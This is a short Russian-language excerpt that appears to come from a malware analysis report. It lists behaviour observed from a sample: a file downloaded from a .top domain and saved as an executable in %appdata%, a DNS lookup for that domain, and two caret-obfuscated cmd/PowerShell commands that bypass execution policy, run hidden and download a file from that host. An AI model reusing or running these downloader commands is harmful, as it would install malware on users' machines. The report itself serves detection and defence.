Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWErsHeLl^.e^XE -exE^cU^tiOnP^Ol^i^cY B^YP^ASS -^nO^p^ROf^IlE ^-WinDoWsTy^le^ Hi^DD^en (nE^W-OBJE^c^T syS^tem^.N^e^T^.weBCliEnT^).DOW^NlO^ADfi^le('http://newfoodas.top/read.php?f...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /c "PoWErsHeLl^.e^XE -exE^cU^tiOnP^Ol^i^cY B^YP^ASS -^nO^p^ROf^IlE ^-WinDoWsTy^le^ Hi^DD^en (nE^W-OBJE^c^T syS^tem^.N^e^T^.weBCliEnT^).DOW^NlO^ADfi^le('http://newfoodas.top/read.php?f...' (со скрытым окном)